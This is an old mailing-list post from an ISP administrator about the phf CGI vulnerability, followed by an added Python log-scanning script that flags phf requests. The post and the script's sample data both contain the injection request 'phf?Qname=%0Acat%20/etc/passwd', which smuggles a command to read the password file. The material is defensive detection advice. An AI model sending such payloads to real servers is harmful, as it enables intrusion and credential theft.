to hack, or not to hack ...
Recently one of our machines was hacked. I'm not sure how many people know
about this hack, but any machine that does not have a shadow password
facility and has a common CGI program called phf is susceptible to attack.
You can use phf to more/grep the etc/passwd file. The way you can check if
you've been hacked is to grep your log files for phf. A failed attack will
look like so:
access_log:aksess-gw3-4.ppp.sn.no unknown - [18/Nov/1996:15:10:36 +1100] "GET /cgi-bin/phf?Qname=%0Acat%20/etc/passwd HTTP/1.0" 404 -
access_log:aksess-gw3-4.ppp.sn.no unknown - [18/Nov/1996:15:16:04 +1100] "GET /cgi-bin/phf?Qname=%0Acat%20/etc/passwd HTTP/1.0" 404 -
A successful attack will look the same without the 404 - at the end of the
entry.
Just thought you guys would be interested.
Sahua,
- mIcHaEl
///\ The Australian Internet Company
c-00 ISP par Excellence
\ > http://www.electric-rain.net/ (mine)
|\_- http://www.aic.net.au/ (not mine)
\ /
.
"On the Plains of Hesitation bleach the bones of countless millions who,
at the dawn of victory, sat down to wait and waiting died."
-G.W Cecil/Adlai Stevenson.
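
The log check described in the message above, as an added example that is not part of the original post: it parses Common Log Format lines (with or without the `access_log:` prefix that grep adds), decodes the request, and reports every request for phf together with its status code. The first sample line is the one quoted in the post; the other three, their hosts and sizes, and the verdict names are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Common Log Format, optionally prefixed with "filename:" by grep.
CLF = re.compile(
    r'^(?:(?P<file>[^:\s]+):)?(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

def classify(status):
    """Say what the HTTP status tells us about the server's answer."""
    if status == 404:
        return "probe-not-found"    # no phf script at that path
    if 200 <= status < 300:
        return "script-responded"   # phf ran: review what it returned
    return "other"

def find_phf_requests(lines):
    """Return one dict per request whose decoded path ends in 'phf'."""
    hits = []
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue                # not a CLF entry, skip it
        parts = urlsplit(m["target"])
        # Decode percent-escapes before matching the script name.
        script = unquote(parts.path).lower().rsplit("/", 1)[-1]
        if script != "phf":
            continue
        query = unquote(parts.query)
        status = int(m["status"])
        hits.append({
            "host": m["host"], "time": m["time"], "status": status,
            # An encoded newline (%0A) in the query is the pattern in the post.
            "newline_in_query": "\n" in query or "\r" in query,
            "verdict": classify(status),
        })
    return hits

# First line is from the post; the remaining three are constructed samples.
SAMPLE = [
    'access_log:aksess-gw3-4.ppp.sn.no unknown - [18/Nov/1996:15:10:36 +1100] "GET /cgi-bin/phf?Qname=%0Acat%20/etc/passwd HTTP/1.0" 404 -',
    '192.0.2.10 - - [18/Nov/1996:16:02:11 +1100] "GET /cgi-bin/phf?Qname=%0Acat%20/etc/passwd HTTP/1.0" 200 1843',
    'client.example.net - - [18/Nov/1996:16:04:02 +1100] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 512',
    'client.example.net - - [18/Nov/1996:16:05:40 +1100] "GET /index.html HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for hit in find_phf_requests(SAMPLE):
        print(hit)
```

Any hit with `newline_in_query` set and a `script-responded` verdict is the entry to follow up on first.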